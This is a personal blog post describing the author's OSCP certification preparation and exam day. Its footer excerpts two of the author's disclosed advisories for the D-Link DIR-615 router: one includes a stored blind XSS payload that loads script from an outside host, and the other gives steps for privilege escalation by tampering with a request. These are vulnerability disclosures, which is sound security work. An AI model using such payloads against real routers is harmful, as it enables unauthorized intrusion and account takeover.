My OSCP Journey — 30–03–2020

-



Hi guys 😊
First things first, I hope all of you and your families are safe during this COVID-19 pandemic. Stay Home, Stay Safe and please take care of your loved ones!!
A heartfelt thank you to God, my family, friends, brothers, sisters, and girlfriend that upheld me with prayer and support throughout this journey. I could not have done this without you.

A brief introduction about myself –

I am currently working as a Cybersecurity Consultant in PwC and I am a bigtime security enthusiast with 3.5+ years of experience in Web/ Mobile/ Network Vulnerability Assessments and Penetration Testing. This field has always been my passion. I will detail down my entire journey which led me to earn the OSCP certification so that you guys can also chart your own paths and estimate the effort and time required from your end to make your dream turn into a reality.

Time spent prior to registering for the certification…

My OSCP journey started around April 2019 when I mentioned it as one of my goals for the performance year 19–20 in my current company. From the first day itself, my vision and intention were clear but I wasn’t aware of how I will be able to achieve this.
In order to get clarity on this, I reached out to my friends who were already preparing for OSCP for their guidance. They first advised me to get hands-on practice of solving vulnerable boxes from vulnhub and hackthebox machines and then once I am able to successfully pwn boxes on my own, they suggested me to go ahead and buy the OSCP labs.
Initially I used to solve vulnhub machines by taking help from the writeups and this went on for 2 months after which I moved to hackthebox machines. Since I only had a few hours after my office to prepare for my exam, I realized I needed an approach to target this. I started noting down the services that each port could offer and what exact steps I needed to execute to achieve this. I also made a comprehensive list of all the ports for my reference so that I could refer to the techniques at any point of time to enter any kind of machine I come across.
In a span of ten days, my rate of cracking active boxes was just 3 and that too with the help of forum hints. Hence, I started working on retired machines and OSCP related HTB boxes. I will share the list of these boxes in the resources list.
With this pace, I was able to solve (40+) * 2 retired machines of Linux and Windows OS with and without writeups. In parallel, I also started bug bounty to save some money to buy OSCP labs and also cleared Synack Assessment.

After registering for the certification…

Finally, on 25 Dec 2019, I registered for OSCP certification and my lab got scheduled from 12th January 2020 onwards. Since I also had office work, I decided to go for 90 days lab subscription.
OSCP LABS Enrolled

12th Jan onwards…

I was really very nervous when my OSCP lab subscription started on 12th Jan. As soon as I received the VPN connection and credentials, I immediately downloaded the study material and took a quick look at the pdf and videos. I thought of coming up with the following plan-
1. Complete pdf and videos within a week
2. Solve 2–3 machines on a daily basis
3. Keep a track of my progress through an excel tracker

How things progressed in reality…

I was able to complete most of the study material in PDF and videos within 3 days (12th to 14th Jan) and then I completed all lab machines including 4 networks — Public, IT, DEV, Admin (60 machines including duplicate 5 boxes) within 4 weeks (15th Jan to 15th Feb). I learned a lot during my whole journey. Especially these are my favorite machines — Pain, Jack, Ghost, Suffernace, Humble, Sean, Timeclock, Master, Slave, Gamma, Bethany :).
My plan was — 4 hours at least for weekdays and at weekends 10+ hours for solving lab machines. I tracked my daily hours in the excel tracker as below-

Since I had completed all lab machines very early, I decided to complete the lab report and exercise report of 5 marks (bonus points) as well.
I did 15 lab machines and all exercise reports within 9 days i.e. (16th to 23rd Feb). After this I decided to book my exam date for 30th March 2020 as I had already planned to attend the Nullcon training in Goa in the 1st week of March.
Exam Scheduled
Since I had plenty of time still left for other things such as buffer overflow and privilege escalation, I thought of completing those as well.
I took 4 days (23rd to 27th Feb) to complete all lab notes properly. I also created a flow chart for each machine I solved since 12th Jan. Which exploit, which techniques I used in labs, I mentioned all these things in my notes for future reference.
Within 3 days (27th to 1st March) I completed Buffer overflow part as well. I practiced multiple times on these apps — brainpan, slmail, vulnserver and minishare. I prepared step by step notes to solve each bof machine / application.
Later I went to Nullcon in the 1st week of March; relaxed and enjoyed with the infosec community. I continued my preparation for OSCP on 6th march once I was back from Goa.
I decided to set up 2 VM's in my host machine. One of Windows 7 machine for Windows Privilege Escalation and one of Ubuntu machine for Linux Privilege Escalation. I used LPEWorkshop by SagiShahar and was familiar with multiple techniques for Windows Privilege Escalation. For Linux Privilege Escalation, I went through various hacking articles and blogs. I prepared all the notes for Privilege Escalation in the cherry tree.
For Windows
For Linux
Since I still had 17 days left for my exam, I checked TJ Nulls OSCP like boxes, went to HTB and purchased VIP membership for a month and completed some machines till 20th march and made notes for each of those machines. After 7 days, I started reading writeups for mostly all OSCP related hackthebox machines and vulnhub machines and made notes for new and important techniques that I learned for these machines from various blogs. Before the exam on Friday, I prepared a checklist of all the important things I may need during the exam. On Saturday I revised all my notes related to buffer overflow. On Sunday, I gave myself some slack and started to setup my laptop, read blogs, relaxed and listened to songs.
As I was worried about the internet in my PG, I kept a spare dongle with myself and rented a full room for one day from my PG owner.
On the exam day…
My exam was scheduled at 8:30 AM. So I woke up early at 6:30 AM and got fresh. I completed all pre-requisite steps for the exam by 8:15 am. After that, I waited for the credential’s email from offsec team. At 8:30, I received it.
How I solved the machines in those 24 hours-
Exam Plan
After the proctor gave me a go-ahead, I started my exam at 8:50 AM. Firstly I started buffer overflow machine. It was supposed to be an easy machine but it took me more than 2 hours to crack. While doing buffer overflow machine, in the backend I used autorecon tool for the rest of the machine’s enumeration. After buffer overflow, I took a 10 min break and then got back to the machines. I went through all machines enumeration autorecon results. I started a 20 number machine and within 2:15 hours I cracked the user and root of this machine. Now I had secured 45 number. I needed an additional 25 number to pass the exam. I went for lunch and came back at 2:15 PM. I started a 10 number machine and found a way to exploit the service. I found an exploit, but that exploit did not work. I did some changes in code and tried again but no luck. I moved to another 20-number machine. I checked my recon results for 20 number machine and found something interesting. I got a user shell within 45 minutes but for root it took me 3.5 hours. Now I had 65 number within 12 hours. I went back to the 10 number machine. I did some more changes in code to get the shell. Finally, it worked after so many troubles. I was very happy. Now I had secured 75 number and only 25 numbers left. I went for dinner and came back for the exam at 11 pm. Now, I had to do a 25-point machine. I checked my recon results for this machine and got to know an unexpected information. I tried the same and realized that it worked. Finally, I got a user shell within 1 hour for 25 number. Now I had 87.5 number after which I took a small break.
However, one bad thing happened. I checked all the screenshots that I gathered for my machines in the cherry tree and realized that for one machine — the buffer overflow one — the screenshots were missing. It was a panic situation for me at that time. My suggestion to you would be to take a backup of all the screenshots separately in a word document or any other note-taking application. After collecting all the information, I went back to privilege escalation on the 25-number machine. But I realized that I was very tired at that time and hence I informed the proctor and went to sleep at around 1:30 AM.
I woke up at 4:00 AM and reconnected my proctor session around 4:15 AM. I started working on privilege escalation again. I tried multiple things, but it got deleted automatically. After struggling with privilege escalation, I decided to leave the box as I had already secured 87.5 marks.
I prepared a one-word document to explain the scenario of how I solved these machines. I took all the screenshots one by one from the cherry tree and pasted them into this word document. Since now I had enough information to prepare my OSCP exam final report, I asked the proctor to close the session. At 7:00 AM, I closed my laptop.
Finally, I was amazed that I completed my OSCP exam with 87.5 points. I took a break and in the afternoon around 3:00 PM I started drafting my report. I completed it by 12:00 AM, rechecked everything and submitted it to offsec team through an email for which I received an acknowledgment email after a few minutes.
Finally, when I woke up on 3rd April, I checked my email and I noticed that an email has come from the Offsec team declaring that I have successfully cleared my OSCP exam.
I can’t explain how happy I was at that point in time.
Finally, I did it
Some tips for OSCP preparation
Keep motivating yourself every day, don’t give up, keep calm, sleep well before the exam and don’t panic during the exam…
Last but not least, All the best guys…Keep rocking! 😊

For OSCP , I created one repository for handy purpose and there are multiple things which i took from different different sources on the internet — https://infosecsanyam261.gitbook.io/tryharder/ . Feel free to connect with me through linkedin or Twitter :)

Comments

Post a Comment

Popular posts from this blog

D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting

-
############################## ############################## ########################## # Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting # Date: 13.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage:  http://www.dlink.co. in # Category: Hardware (Wi-fi Router) # Hardware Link:  http://www.dlink.co.in/ products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19742 ############################## ############################## ########################### Reproduction Steps:  — — — — — — — — — — — — — — —  Login to your wi-fi router gateway with admin credentials [i.e:  http://192.168.0.1 ] Go to Maintenance page and click on Admin on the left pannel. Put blind XSS Payload in to the name field — “><script src= https://ptguy.xss.ht ></ script>. This payload saved by the server and its reflected in the user page. Every refresh in the user home pag
Read more

D-Link DIR-615 Wireless Router —Vertical Privilege Escalation - CVE-2019–19743

-
Image
###################################################################################### # Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation # Date: 10.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19743 ####################################################################################### Reproduction Steps: Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1 ] Go to the Maintenance page and click on Admin on the left panel. There is an option to create a user and by default, it shows only user accounts. Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id with burp suite. Privilege Escalation Post Request
Read more

OWASP Top 10 2017 — Web Application Security Risks

-
Image
What is OWASP :  The Open Web Application Security Project ( OWASP ) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. OWASP is an organization filled with security experts from around the world who provide information about applications and the risks posed, in the most direct, neutral, and practical way. Since 2003, OWASP has been releasing the OWASP Top 10 list every three/four years. The list consists of the top biggest Web Application Security Risks according to OWASP. The list is compiled with the latest vulnerabilities, threats and attacks, as well as detection tactics and remediation. OWASP Top 10 project members create the list by analyzing the occurrence rates and the general severity of each threat facing our rapidly evolving application world. Image Source google A-1) SQL INJECTION : W HAT IS IT? Websites and apps occasionally need to run commands on the underlying database or operati
Read more